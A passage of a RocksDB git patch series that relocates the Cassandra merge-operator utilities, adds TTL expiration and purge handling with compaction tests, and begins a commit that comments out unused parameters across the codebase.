OpenDb() { + DB* db; + Options options; + options.create_if_missing = true; + options.merge_operator.reset(new CassandraValueMergeOperator()); + auto* cf_factory = new TestCompactionFilterFactory(purge_ttl_on_expiration_); + 
options.compaction_filter_factory.reset(cf_factory); + EXPECT_OK(DB::Open(options, kDbName, &db)); + return std::shared_ptr(db); + } + + bool purge_ttl_on_expiration_ = false; +}; + +// THE TEST CASES BEGIN HERE + +TEST_F(CassandraFunctionalTest, SimpleMergeTest) { + CassandraStore store(OpenDb()); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kTombstone, 0, 5), + std::make_tuple(kColumn, 1, 8), + std::make_tuple(kExpiringColumn, 2, 5), + })); + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kColumn, 0, 2), + std::make_tuple(kExpiringColumn, 1, 5), + std::make_tuple(kTombstone, 2, 7), + std::make_tuple(kExpiringColumn, 7, 17), + })); + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, 6), + std::make_tuple(kTombstone, 1, 5), + std::make_tuple(kColumn, 2, 4), + std::make_tuple(kTombstone, 11, 11), + })); + + auto ret = store.Get("k1"); + + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 5); + VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6); + VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8); + VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7); + VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17); + VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11); +} + +TEST_F(CassandraFunctionalTest, + CompactionShouldConvertExpiredColumnsToTombstone) { + CassandraStore store(OpenDb()); + int64_t now= time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kColumn, 2, ToMicroSeconds(now)) + })); + + store.Flush(); + store.Compact(); + + auto ret = store.Get("k1"); + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 4); + VerifyRowValueColumns(merged.columns_, 0, kTombstone, 0, ToMicroSeconds(now - 10)); + VerifyRowValueColumns(merged.columns_, 1, kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)); + VerifyRowValueColumns(merged.columns_, 2, kColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 3, kTombstone, 3, ToMicroSeconds(now)); +} + + +TEST_F(CassandraFunctionalTest, + CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn) { + purge_ttl_on_expiration_ = true; + CassandraStore store(OpenDb()); + int64_t now = time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kColumn, 2, ToMicroSeconds(now)) + })); + + store.Flush(); + store.Compact(); + + auto ret = store.Get("k1"); + ASSERT_TRUE(std::get<0>(ret)); + RowValue& merged = std::get<1>(ret); + EXPECT_EQ(merged.columns_.size(), 3); + VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 1, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 1, kColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(merged.columns_, 2, 
kTombstone, 3, ToMicroSeconds(now)); +} + +TEST_F(CassandraFunctionalTest, + CompactionShouldRemoveRowWhenAllColumnsExpiredIfPurgeTtlIsOn) { + purge_ttl_on_expiration_ = true; + CassandraStore store(OpenDb()); + int64_t now = time(nullptr); + + store.Append("k1", CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 20)), + })); + + store.Flush(); + + store.Append("k1",CreateTestRowValue({ + std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), + })); + + store.Flush(); + store.Compact(); + ASSERT_FALSE(std::get<0>(store.Get("k1"))); +} + +} // namespace cassandra +} // namespace rocksdb + +int main(int argc, char** argv) { + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} diff --git a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc b/utilities/cassandra/cassandra_row_merge_test.cc similarity index 92% rename from utilities/merge_operators/cassandra/cassandra_row_merge_test.cc rename to utilities/cassandra/cassandra_row_merge_test.cc index 76d112c7b03..78c7d8e5786 100644 --- a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc +++ b/utilities/cassandra/cassandra_row_merge_test.cc @@ -2,13 +2,11 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/test_utils.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/test_utils.h" namespace rocksdb { namespace cassandra { diff --git a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc b/utilities/cassandra/cassandra_serialize_test.cc similarity index 96% rename from utilities/merge_operators/cassandra/cassandra_serialize_test.cc rename to utilities/cassandra/cassandra_serialize_test.cc index 978878b64f8..68d2c163d96 100644 --- a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc +++ b/utilities/cassandra/cassandra_serialize_test.cc @@ -2,11 +2,9 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/serialize.h" using namespace rocksdb::cassandra; diff --git a/utilities/merge_operators/cassandra/format.cc b/utilities/cassandra/format.cc similarity index 75% rename from utilities/merge_operators/cassandra/format.cc rename to utilities/cassandra/format.cc index 01eff67e3ef..2b096cdbb96 100644 --- a/utilities/merge_operators/cassandra/format.cc +++ b/utilities/cassandra/format.cc @@ -2,8 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
#include "format.h" @@ -11,7 +9,7 @@ #include #include -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/serialize.h" namespace rocksdb { namespace cassandra { @@ -42,7 +40,7 @@ void ColumnBase::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(index_, dest); } -std::unique_ptr ColumnBase::Deserialize(const char* src, +std::shared_ptr ColumnBase::Deserialize(const char* src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); if ((mask & ColumnTypeMask::DELETION_MASK) != 0) { @@ -79,7 +77,7 @@ void Column::Serialize(std::string* dest) const { dest->append(value_, value_size_); } -std::unique_ptr Column::Deserialize(const char *src, +std::shared_ptr Column::Deserialize(const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(mask); @@ -89,8 +87,8 @@ std::unique_ptr Column::Deserialize(const char *src, offset += sizeof(timestamp); int32_t value_size = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(value_size); - return std::unique_ptr( - new Column(mask, index, timestamp, value_size, src + offset)); + return std::make_shared( + mask, index, timestamp, value_size, src + offset); } ExpiringColumn::ExpiringColumn( @@ -112,7 +110,32 @@ void ExpiringColumn::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(ttl_, dest); } -std::unique_ptr ExpiringColumn::Deserialize( +std::chrono::time_point ExpiringColumn::TimePoint() const { + return std::chrono::time_point(std::chrono::microseconds(Timestamp())); +} + +std::chrono::seconds ExpiringColumn::Ttl() const { + return std::chrono::seconds(ttl_); +} + +bool ExpiringColumn::Expired() const { + return TimePoint() + Ttl() < std::chrono::system_clock::now(); +} + +std::shared_ptr ExpiringColumn::ToTombstone() const { + auto expired_at = (TimePoint() + Ttl()).time_since_epoch(); + int32_t local_deletion_time = static_cast( + std::chrono::duration_cast(expired_at).count()); + int64_t marked_for_delete_at = + std::chrono::duration_cast(expired_at).count(); + return std::make_shared( + ColumnTypeMask::DELETION_MASK, + Index(), + local_deletion_time, + marked_for_delete_at); +} + +std::shared_ptr ExpiringColumn::Deserialize( const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); @@ -126,8 +149,8 @@ std::unique_ptr ExpiringColumn::Deserialize( const char* value = src + offset; offset += value_size; int32_t ttl = rocksdb::cassandra::Deserialize(src, offset); - return std::unique_ptr( - new ExpiringColumn(mask, index, timestamp, value_size, value, ttl)); + return std::make_shared( + mask, index, timestamp, value_size, value, ttl); } Tombstone::Tombstone( @@ -153,7 +176,7 @@ void Tombstone::Serialize(std::string* dest) const { rocksdb::cassandra::Serialize(marked_for_delete_at_, dest); } -std::unique_ptr Tombstone::Deserialize(const char *src, +std::shared_ptr Tombstone::Deserialize(const char *src, std::size_t offset) { int8_t mask = rocksdb::cassandra::Deserialize(src, offset); offset += sizeof(mask); @@ -164,8 +187,8 @@ std::unique_ptr Tombstone::Deserialize(const char *src, offset += sizeof(int32_t); int64_t marked_for_delete_at = rocksdb::cassandra::Deserialize(src, offset); - return std::unique_ptr( - new Tombstone(mask, index, local_deletion_time, marked_for_delete_at)); + return std::make_shared( + mask, index, local_deletion_time, marked_for_delete_at); } RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at) @@ 
-173,7 +196,7 @@ RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at) marked_for_delete_at_(marked_for_delete_at), columns_(), last_modified_time_(0) {} -RowValue::RowValue(std::vector> columns, +RowValue::RowValue(Columns columns, int64_t last_modified_time) : local_deletion_time_(kDefaultLocalDeletionTime), marked_for_delete_at_(kDefaultMarkedForDeleteAt), @@ -208,6 +231,49 @@ void RowValue::Serialize(std::string* dest) const { } } +RowValue RowValue::PurgeTtl(bool* changed) const { + *changed = false; + Columns new_columns; + for (auto& column : columns_) { + if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) { + std::shared_ptr expiring_column = + std::static_pointer_cast(column); + + if(expiring_column->Expired()){ + *changed = true; + continue; + } + } + + new_columns.push_back(column); + } + return RowValue(std::move(new_columns), last_modified_time_); +} + +RowValue RowValue::ExpireTtl(bool* changed) const { + *changed = false; + Columns new_columns; + for (auto& column : columns_) { + if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) { + std::shared_ptr expiring_column = + std::static_pointer_cast(column); + + if(expiring_column->Expired()) { + shared_ptr tombstone = expiring_column->ToTombstone(); + new_columns.push_back(tombstone); + *changed = true; + continue; + } + } + new_columns.push_back(column); + } + return RowValue(std::move(new_columns), last_modified_time_); +} + +bool RowValue::Empty() const { + return columns_.empty(); +} + RowValue RowValue::Deserialize(const char *src, std::size_t size) { std::size_t offset = 0; assert(size >= sizeof(local_deletion_time_) + sizeof(marked_for_delete_at_)); @@ -223,7 +289,7 @@ RowValue RowValue::Deserialize(const char *src, std::size_t size) { assert(local_deletion_time == kDefaultLocalDeletionTime); assert(marked_for_delete_at == kDefaultMarkedForDeleteAt); - std::vector> columns; + Columns columns; int64_t last_modified_time = 0; while (offset < size) { auto c = ColumnBase::Deserialize(src, offset); @@ -254,7 +320,7 @@ RowValue RowValue::Merge(std::vector&& values) { return r1.LastModifiedTime() > r2.LastModifiedTime(); }); - std::map> merged_columns; + std::map> merged_columns; int64_t tombstone_timestamp = 0; for (auto& value : values) { @@ -268,17 +334,17 @@ RowValue RowValue::Merge(std::vector&& values) { for (auto& column : value.columns_) { int8_t index = column->Index(); if (merged_columns.find(index) == merged_columns.end()) { - merged_columns[index] = std::move(column); + merged_columns[index] = column; } else { if (column->Timestamp() > merged_columns[index]->Timestamp()) { - merged_columns[index] = std::move(column); + merged_columns[index] = column; } } } } int64_t last_modified_time = 0; - std::vector> columns; + Columns columns; for (auto& pair: merged_columns) { // For some row, its last_modified_time > row tombstone_timestamp, but // it might have rows whose timestamp is ealier than tombstone, so we diff --git a/utilities/merge_operators/cassandra/format.h b/utilities/cassandra/format.h similarity index 80% rename from utilities/merge_operators/cassandra/format.h rename to utilities/cassandra/format.h index 0ffd9a5bb98..d8f51df1492 100644 --- a/utilities/merge_operators/cassandra/format.h +++ b/utilities/cassandra/format.h @@ -2,8 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). 
-// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. /** * The encoding of Cassandra Row Value. @@ -57,6 +55,7 @@ */ #pragma once +#include #include #include #include "rocksdb/merge_operator.h" @@ -72,6 +71,7 @@ enum ColumnTypeMask { EXPIRATION_MASK = 0x02, }; + class ColumnBase { public: ColumnBase(int8_t mask, int8_t index); @@ -82,8 +82,7 @@ class ColumnBase { virtual int8_t Index() const; virtual std::size_t Size() const; virtual void Serialize(std::string* dest) const; - - static std::unique_ptr Deserialize(const char* src, + static std::shared_ptr Deserialize(const char* src, std::size_t offset); private: @@ -99,8 +98,7 @@ class Column : public ColumnBase { virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; - - static std::unique_ptr Deserialize(const char* src, + static std::shared_ptr Deserialize(const char* src, std::size_t offset); private: @@ -109,44 +107,50 @@ class Column : public ColumnBase { const char* value_; }; -class ExpiringColumn : public Column { +class Tombstone : public ColumnBase { public: - ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp, - int32_t value_size, const char* value, int32_t ttl); + Tombstone(int8_t mask, int8_t index, + int32_t local_deletion_time, int64_t marked_for_delete_at); + virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; - static std::unique_ptr Deserialize(const char* src, - std::size_t offset); + static std::shared_ptr Deserialize(const char* src, + std::size_t offset); private: - int32_t ttl_; + int32_t local_deletion_time_; + int64_t marked_for_delete_at_; }; -class Tombstone : public ColumnBase { +class ExpiringColumn : public Column { public: - Tombstone(int8_t mask, int8_t index, - int32_t local_deletion_time, int64_t marked_for_delete_at); + ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp, + int32_t value_size, const char* value, int32_t ttl); - virtual int64_t Timestamp() const override; virtual std::size_t Size() const override; virtual void Serialize(std::string* dest) const override; + bool Expired() const; + std::shared_ptr ToTombstone() const; - static std::unique_ptr Deserialize(const char* src, - std::size_t offset); + static std::shared_ptr Deserialize(const char* src, + std::size_t offset); private: - int32_t local_deletion_time_; - int64_t marked_for_delete_at_; + int32_t ttl_; + std::chrono::time_point TimePoint() const; + std::chrono::seconds Ttl() const; }; +typedef std::vector> Columns; + class RowValue { public: // Create a Row Tombstone. RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at); // Create a Row containing columns. - RowValue(std::vector> columns, + RowValue(Columns columns, int64_t last_modified_time); RowValue(const RowValue& that) = delete; RowValue(RowValue&& that) noexcept = default; @@ -159,6 +163,9 @@ class RowValue { // otherwise it returns the max timestamp of containing columns. int64_t LastModifiedTime() const; void Serialize(std::string* dest) const; + RowValue PurgeTtl(bool* changed) const; + RowValue ExpireTtl(bool* changed) const; + bool Empty() const; static RowValue Deserialize(const char* src, std::size_t size); // Merge multiple rows according to their timestamp. 
@@ -167,12 +174,20 @@ class RowValue { private: int32_t local_deletion_time_; int64_t marked_for_delete_at_; - std::vector> columns_; + Columns columns_; int64_t last_modified_time_; + FRIEND_TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired); + FRIEND_TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones); FRIEND_TEST(RowValueMergeTest, Merge); FRIEND_TEST(RowValueMergeTest, MergeWithRowTombstone); - FRIEND_TEST(CassandraMergeTest, SimpleTest); + FRIEND_TEST(CassandraFunctionalTest, SimpleMergeTest); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldConvertExpiredColumnsToTombstone); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn); + FRIEND_TEST( + CassandraFunctionalTest, CompactionShouldRemoveRowWhenAllColumnExpiredIfPurgeTtlIsOn); }; } // namepsace cassandrda diff --git a/utilities/merge_operators/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc similarity index 98% rename from utilities/merge_operators/cassandra/merge_operator.cc rename to utilities/cassandra/merge_operator.cc index 03b4ec2e39f..75817a78b28 100644 --- a/utilities/merge_operators/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -13,7 +13,7 @@ #include "rocksdb/slice.h" #include "rocksdb/merge_operator.h" #include "utilities/merge_operators.h" -#include "utilities/merge_operators/cassandra/format.h" +#include "utilities/cassandra/format.h" namespace rocksdb { namespace cassandra { diff --git a/utilities/merge_operators/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h similarity index 100% rename from utilities/merge_operators/cassandra/merge_operator.h rename to utilities/cassandra/merge_operator.h diff --git a/utilities/merge_operators/cassandra/serialize.h b/utilities/cassandra/serialize.h similarity index 100% rename from utilities/merge_operators/cassandra/serialize.h rename to utilities/cassandra/serialize.h diff --git a/utilities/merge_operators/cassandra/test_utils.cc b/utilities/cassandra/test_utils.cc similarity index 73% rename from utilities/merge_operators/cassandra/test_utils.cc rename to utilities/cassandra/test_utils.cc index 91b9e634974..68d0381e0e5 100644 --- a/utilities/merge_operators/cassandra/test_utils.cc +++ b/utilities/cassandra/test_utils.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. 
@@ -12,29 +12,29 @@ namespace cassandra { const char kData[] = {'d', 'a', 't', 'a'}; const char kExpiringData[] = {'e', 'd', 'a', 't', 'a'}; const int32_t kLocalDeletionTime = 1; -const int32_t kTtl = 100; +const int32_t kTtl = 86400; const int8_t kColumn = 0; const int8_t kTombstone = 1; const int8_t kExpiringColumn = 2; -std::unique_ptr CreateTestColumn(int8_t mask, +std::shared_ptr CreateTestColumn(int8_t mask, int8_t index, int64_t timestamp) { if ((mask & ColumnTypeMask::DELETION_MASK) != 0) { - return std::unique_ptr(new Tombstone( + return std::shared_ptr(new Tombstone( mask, index, kLocalDeletionTime, timestamp)); } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) { - return std::unique_ptr(new ExpiringColumn( + return std::shared_ptr(new ExpiringColumn( mask, index, timestamp, sizeof(kExpiringData), kExpiringData, kTtl)); } else { - return std::unique_ptr( + return std::shared_ptr( new Column(mask, index, timestamp, sizeof(kData), kData)); } } RowValue CreateTestRowValue( std::vector> column_specs) { - std::vector> columns; + std::vector> columns; int64_t last_modified_time = 0; for (auto spec: column_specs) { auto c = CreateTestColumn(std::get<0>(spec), std::get<1>(spec), @@ -50,7 +50,7 @@ RowValue CreateRowTombstone(int64_t timestamp) { } void VerifyRowValueColumns( - std::vector> &columns, + std::vector> &columns, std::size_t index_of_vector, int8_t expected_mask, int8_t expected_index, @@ -61,5 +61,9 @@ void VerifyRowValueColumns( EXPECT_EQ(expected_index, columns[index_of_vector]->Index()); } +int64_t ToMicroSeconds(int64_t seconds) { + return seconds * (int64_t)1000000; +} + } } diff --git a/utilities/merge_operators/cassandra/test_utils.h b/utilities/cassandra/test_utils.h similarity index 82% rename from utilities/merge_operators/cassandra/test_utils.h rename to utilities/cassandra/test_utils.h index 4025b2a3fe8..7ca6cfd6146 100644 --- a/utilities/merge_operators/cassandra/test_utils.h +++ b/utilities/cassandra/test_utils.h @@ -8,8 +8,8 @@ #pragma once #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/serialize.h" namespace rocksdb { namespace cassandra { @@ -22,7 +22,7 @@ extern const int8_t kTombstone; extern const int8_t kExpiringColumn; -std::unique_ptr CreateTestColumn(int8_t mask, +std::shared_ptr CreateTestColumn(int8_t mask, int8_t index, int64_t timestamp); @@ -32,12 +32,14 @@ RowValue CreateTestRowValue( RowValue CreateRowTombstone(int64_t timestamp); void VerifyRowValueColumns( - std::vector> &columns, + std::vector> &columns, std::size_t index_of_vector, int8_t expected_mask, int8_t expected_index, int64_t expected_timestamp ); +int64_t ToMicroSeconds(int64_t seconds); + } } diff --git a/utilities/merge_operators/cassandra/cassandra_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_merge_test.cc deleted file mode 100644 index 84886161e25..00000000000 --- a/utilities/merge_operators/cassandra/cassandra_merge_test.cc +++ /dev/null @@ -1,134 +0,0 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
- -#include - -#include "rocksdb/db.h" -#include "rocksdb/merge_operator.h" -#include "rocksdb/utilities/db_ttl.h" -#include "util/testharness.h" -#include "util/random.h" -#include "utilities/merge_operators.h" -#include "utilities/merge_operators/cassandra/merge_operator.h" -#include "utilities/merge_operators/cassandra/test_utils.h" - -using namespace rocksdb; - -namespace rocksdb { -namespace cassandra { - -// Path to the database on file system -const std::string kDbName = test::TmpDir() + "/cassandramerge_test"; - -class CassandraStore { - public: - explicit CassandraStore(std::shared_ptr db) - : db_(db), - merge_option_(), - get_option_() { - assert(db); - } - - bool Append(const std::string& key, const RowValue& val){ - std::string result; - val.Serialize(&result); - Slice valSlice(result.data(), result.size()); - auto s = db_->Merge(merge_option_, key, valSlice); - - if (s.ok()) { - return true; - } else { - std::cerr << "ERROR " << s.ToString() << std::endl; - return false; - } - } - - std::tuple Get(const std::string& key){ - std::string result; - auto s = db_->Get(get_option_, key, &result); - - if (s.ok()) { - return std::make_tuple(true, - RowValue::Deserialize(result.data(), - result.size())); - } - - if (!s.IsNotFound()) { - std::cerr << "ERROR " << s.ToString() << std::endl; - } - - return std::make_tuple(false, RowValue(0, 0)); - } - - private: - std::shared_ptr db_; - WriteOptions merge_option_; - ReadOptions get_option_; -}; - - -// The class for unit-testing -class CassandraMergeTest : public testing::Test { - public: - CassandraMergeTest() { - DestroyDB(kDbName, Options()); // Start each test with a fresh DB - } - - std::shared_ptr OpenDb() { - DB* db; - Options options; - options.create_if_missing = true; - options.merge_operator.reset(new CassandraValueMergeOperator()); - EXPECT_OK(DB::Open(options, kDbName, &db)); - return std::shared_ptr(db); - } -}; - -// THE TEST CASES BEGIN HERE - -TEST_F(CassandraMergeTest, SimpleTest) { - auto db = OpenDb(); - CassandraStore store(db); - - store.Append("k1", CreateTestRowValue({ - std::make_tuple(kTombstone, 0, 5), - std::make_tuple(kColumn, 1, 8), - std::make_tuple(kExpiringColumn, 2, 5), - })); - store.Append("k1",CreateTestRowValue({ - std::make_tuple(kColumn, 0, 2), - std::make_tuple(kExpiringColumn, 1, 5), - std::make_tuple(kTombstone, 2, 7), - std::make_tuple(kExpiringColumn, 7, 17), - })); - store.Append("k1", CreateTestRowValue({ - std::make_tuple(kExpiringColumn, 0, 6), - std::make_tuple(kTombstone, 1, 5), - std::make_tuple(kColumn, 2, 4), - std::make_tuple(kTombstone, 11, 11), - })); - - auto ret = store.Get("k1"); - - ASSERT_TRUE(std::get<0>(ret)); - RowValue& merged = std::get<1>(ret); - EXPECT_EQ(merged.columns_.size(), 5); - VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6); - VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8); - VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7); - VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17); - VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11); -} - - -} // namespace cassandra -} // namespace rocksdb - -int main(int argc, char** argv) { - ::testing::InitGoogleTest(&argc, argv); - return RUN_ALL_TESTS(); -} From 1d7048c5985e60be8e356663ec3cb6d020adb44d Mon Sep 17 00:00:00 2001 From: Victor Gao Date: Fri, 21 Jul 2017 14:50:24 -0700 Subject: [PATCH 025/205] comment out unused parameters Summary: This uses `clang-tidy` to comment out unused parameters (in functions, methods and lambdas) in fbcode. 
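To illustrate the mechanical change on the first hunk below (cache_test.cc): the parameter keeps its type, so signatures and overrides are unchanged, but its name is commented out, which stops -Wunused-parameter from firing. A minimal side-by-side sketch (the second function is renamed here only so both versions compile together):

#include "rocksdb/slice.h"
using rocksdb::Slice;

// before: both parameters are unused and would trigger -Wunused-parameter
void dumbDeleter(const Slice& key, void* value) {}
// after: names commented out; the function's type is identical
void dumbDeleterFixed(const Slice& /*key*/, void* /*value*/) {}
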
Cases that the tool failed to handle are fixed manually. Reviewed By: igorsugak Differential Revision: D5454343 fbshipit-source-id: 5dee339b4334e25e963891b519a5aa81fbf627b2 --- cache/cache_test.cc | 6 +- cache/clock_cache.cc | 2 +- cache/sharded_cache.cc | 2 +- db/builder.cc | 8 +- db/c.cc | 16 +- db/column_family_test.cc | 51 +++--- db/compact_files_test.cc | 9 +- db/compacted_db_impl.h | 45 ++--- db/compaction_iterator.cc | 2 +- db/compaction_iterator.h | 2 +- db/compaction_iterator_test.cc | 29 ++-- db/compaction_job_stats_test.cc | 10 +- db/compaction_picker.cc | 9 +- db/compaction_picker.h | 26 +-- db/compaction_picker_test.cc | 4 +- db/comparator_db_test.cc | 18 +- db/db_block_cache_test.cc | 2 +- db/db_bloom_filter_test.cc | 4 +- db/db_compaction_filter_test.cc | 48 +++--- db/db_compaction_test.cc | 46 +++-- db/db_dynamic_level_test.cc | 4 +- db/db_flush_test.cc | 4 +- db/db_impl.cc | 27 +-- db/db_impl_compaction_flush.cc | 2 +- db/db_impl_readonly.cc | 2 +- db/db_impl_readonly.h | 59 +++---- db/db_impl_write.cc | 2 +- db/db_iter_test.cc | 6 +- db/db_iterator_test.cc | 6 +- db/db_memtable_test.cc | 2 +- db/db_properties_test.cc | 12 +- db/db_sst_test.cc | 13 +- db/db_tailing_iter_test.cc | 6 +- db/db_test.cc | 163 +++++++++--------- db/db_test2.cc | 23 ++- db/db_test_util.cc | 11 +- db/db_test_util.h | 2 +- db/db_universal_compaction_test.cc | 50 +++--- db/deletefile_test.cc | 2 +- db/external_sst_file_test.cc | 15 +- db/fault_injection_test.cc | 4 +- db/file_indexer_test.cc | 6 +- db/forward_iterator.cc | 2 +- db/forward_iterator.h | 2 +- db/internal_stats.cc | 117 +++++++------ db/listener_test.cc | 17 +- db/malloc_stats.cc | 2 +- db/manual_compaction_test.cc | 6 +- db/memtable_list.cc | 4 +- db/merge_test.cc | 2 +- db/plain_table_db_test.cc | 2 +- db/prefix_test.cc | 6 +- db/table_cache.cc | 4 +- db/table_properties_collector.cc | 4 +- db/table_properties_collector.h | 2 +- db/table_properties_collector_test.cc | 19 +- db/version_builder.cc | 2 +- db/version_edit.cc | 2 +- db/version_set.cc | 6 +- db/version_set.h | 2 +- db/version_set_test.cc | 4 +- db/wal_manager_test.cc | 2 +- db/write_batch.cc | 6 +- db/write_batch_test.cc | 32 ++-- db/write_callback_test.cc | 6 +- db/write_thread.cc | 3 +- env/env_encryption.cc | 14 +- env/env_hdfs.cc | 10 +- env/env_test.cc | 21 ++- env/io_posix.cc | 4 +- env/io_posix.h | 2 +- env/mock_env.cc | 14 +- hdfs/env_hdfs.h | 101 ++++++----- include/rocksdb/cache.h | 3 +- include/rocksdb/compaction_filter.h | 12 +- include/rocksdb/db.h | 2 +- include/rocksdb/env.h | 51 +++--- include/rocksdb/filter_policy.h | 5 +- include/rocksdb/iterator.h | 2 +- include/rocksdb/listener.h | 4 +- include/rocksdb/memtablerep.h | 8 +- include/rocksdb/merge_operator.h | 15 +- include/rocksdb/rate_limiter.h | 2 +- include/rocksdb/slice.h | 2 +- include/rocksdb/slice_transform.h | 4 +- include/rocksdb/statistics.h | 2 +- include/rocksdb/utilities/geo_db.h | 2 +- .../utilities/optimistic_transaction_db.h | 2 +- include/rocksdb/utilities/transaction.h | 6 +- include/rocksdb/wal_filter.h | 18 +- include/rocksdb/write_batch.h | 11 +- memtable/hash_cuckoo_rep.cc | 6 +- memtable/hash_linklist_rep.cc | 14 +- memtable/hash_skiplist_rep.cc | 14 +- memtable/skiplistrep.cc | 2 +- memtable/vectorrep.cc | 6 +- options/options_helper.cc | 2 +- options/options_parser.cc | 2 +- port/port_posix.cc | 2 +- port/stack_trace.cc | 2 +- table/adaptive_table_factory.cc | 2 +- table/adaptive_table_factory.h | 5 +- table/block_based_filter_block.cc | 10 